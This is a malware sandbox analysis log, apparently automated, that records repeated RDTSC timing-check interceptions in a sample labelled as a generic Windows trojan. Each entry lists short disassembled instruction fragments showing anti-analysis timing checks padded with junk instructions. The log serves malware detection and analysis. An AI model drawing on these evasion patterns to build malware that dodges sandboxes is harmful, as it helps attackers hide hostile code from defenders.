Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D56396 second address: D5639A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5639A second address: D563C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jg 00007F3620DC90F6h 0x0000000d pop esi 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 jo 00007F3620DC90F8h 0x00000018 push eax 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F3620DC90FEh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D563C4 second address: D563E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5B6BC second address: D5B6D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3620DC9102h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5BF2D second address: D5BF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5BF32 second address: D5BF37 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C1E3 second address: D5C1FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C1FE second address: D5C203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C36D second address: D5C379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C379 second address: D5C37D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C4ED second address: D5C4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C4F3 second address: D5C4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C4F8 second address: D5C504 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F362081F59Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C669 second address: D5C66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C66F second address: D5C6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F362081F5A1h 0x00000009 popad 0x0000000a jmp 00007F362081F5A4h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F362081F59Eh 0x00000017 push edx 0x00000018 jnc 00007F362081F596h 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C828 second address: D5C846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3620DC90FCh 0x0000000d jmp 00007F3620DC90FAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D63FFC second address: D64008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F362081F596h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D648B2 second address: D648D9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3620DC90F6h 0x00000008 jmp 00007F3620DC9105h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007F3620DC90F8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D648D9 second address: D648DE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D64A2C second address: D64A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D64B73 second address: D64B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D64EC5 second address: D64EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F3620DC90F6h 0x0000000a jmp 00007F3620DC90FFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D64EDE second address: D64EE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6E0F4 second address: D6E0FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6CD6E second address: D6CD72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6CD72 second address: D6CD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6CEC5 second address: D6CED1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6CED1 second address: D6CED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6CED5 second address: D6CEEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 js 00007F362081F596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jnp 00007F362081F5A2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6CEEA second address: D6CEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6D1D5 second address: D6D1DB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6D1DB second address: D6D1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F3620DC90FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6D1E9 second address: D6D1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 jnc 00007F362081F596h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6D1F7 second address: D6D223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3620DC90F6h 0x0000000a popad 0x0000000b push edx 0x0000000c jmp 00007F3620DC9107h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6D969 second address: D6D975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F362081F596h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6DAD7 second address: D6DAEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3620DC9104h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6DAEF second address: D6DAF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6DAF8 second address: D6DB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3620DC90FBh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D0FAD2 second address: D0FAD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6DF52 second address: D6DF56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6C876 second address: D6C87B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D728EA second address: D72900 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3620DC90F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3620DC90FAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D29028 second address: D2902E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2902E second address: D2907D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 nop 0x00000007 lea eax, dword ptr [ebp+1248DDAAh] 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F3620DC90F8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 nop 0x00000028 push ecx 0x00000029 push ebx 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c pop ebx 0x0000002d pop ecx 0x0000002e push eax 0x0000002f pushad 0x00000030 jns 00007F3620DC90F8h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F3620DC9103h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2907D second address: D0EEC2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F362081F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F362081F598h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jns 00007F362081F59Ch 0x0000002c jng 00007F362081F59Ch 0x00000032 mov ecx, dword ptr [ebp+122D2936h] 0x00000038 call dword ptr [ebp+122D39C6h] 0x0000003e jl 00007F362081F5C5h 0x00000044 push edx 0x00000045 jmp 00007F362081F5A5h 0x0000004a pushad 0x0000004b popad 0x0000004c pop edx 0x0000004d jmp 00007F362081F5A6h 0x00000052 push ebx 0x00000053 push ebx 0x00000054 pushad 0x00000055 popad 0x00000056 pop ebx 0x00000057 pushad 0x00000058 jg 00007F362081F596h 0x0000005e jmp 00007F362081F5A7h 0x00000063 push ecx 0x00000064 pop ecx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D295D0 second address: D295D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D295D4 second address: D295F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F362081F59Bh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F362081F596h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D295F6 second address: D29625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jne 00007F3620DC90F6h 0x00000015 popad 0x00000016 push edi 0x00000017 jnp 00007F3620DC90F6h 0x0000001d pop edi 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 ja 00007F3620DC90FCh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D29625 second address: D29655 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F362081F598h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F362081F5AEh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D297B5 second address: D297BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D29D5D second address: D29D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D29D61 second address: D29D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F3620DC90FBh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D29E72 second address: D29E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A097 second address: D2A0AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9104h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A0AF second address: D2A0CB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F362081F59Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F362081F596h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A0CB second address: D2A0CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A0CF second address: D2A0D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A0D5 second address: D2A0DF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3620DC90FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A0DF second address: D2A0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A0EF second address: D2A0F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A0F3 second address: D2A0FD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F362081F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A1AA second address: D2A1F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 js 00007F3620DC90F6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 cld 0x00000012 lea eax, dword ptr [ebp+1248DDEEh] 0x00000018 jmp 00007F3620DC9101h 0x0000001d mov ecx, dword ptr [ebp+122D1E43h] 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jnc 00007F3620DC90F6h 0x0000002d jmp 00007F3620DC9102h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A1F6 second address: D2A23C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edx, dword ptr [ebp+122D2B3Dh] 0x00000012 jmp 00007F362081F5A6h 0x00000017 lea eax, dword ptr [ebp+1248DDAAh] 0x0000001d mov ecx, dword ptr [ebp+122D2B8Dh] 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push esi 0x00000029 pop esi 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A23C second address: D2A253 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9103h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A253 second address: D0FAD2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F362081F59Ch 0x00000008 js 00007F362081F596h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 movsx ecx, cx 0x00000016 or dx, 5C3Dh 0x0000001b call dword ptr [ebp+122D1E1Ah] 0x00000021 push esi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F362081F59Bh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72BE1 second address: D72BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72BE5 second address: D72C0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F362081F596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F362081F5A8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72C0B second address: D72C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72C11 second address: D72C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72C1D second address: D72C23 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72C23 second address: D72C2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72C2A second address: D72C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72EE8 second address: D72EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72EEC second address: D72EF6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3620DC90F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72EF6 second address: D72F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F362081F596h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72F00 second address: D72F04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D7340C second address: D7341A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jne 00007F362081F596h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D7341A second address: D7341E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D74FC3 second address: D74FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
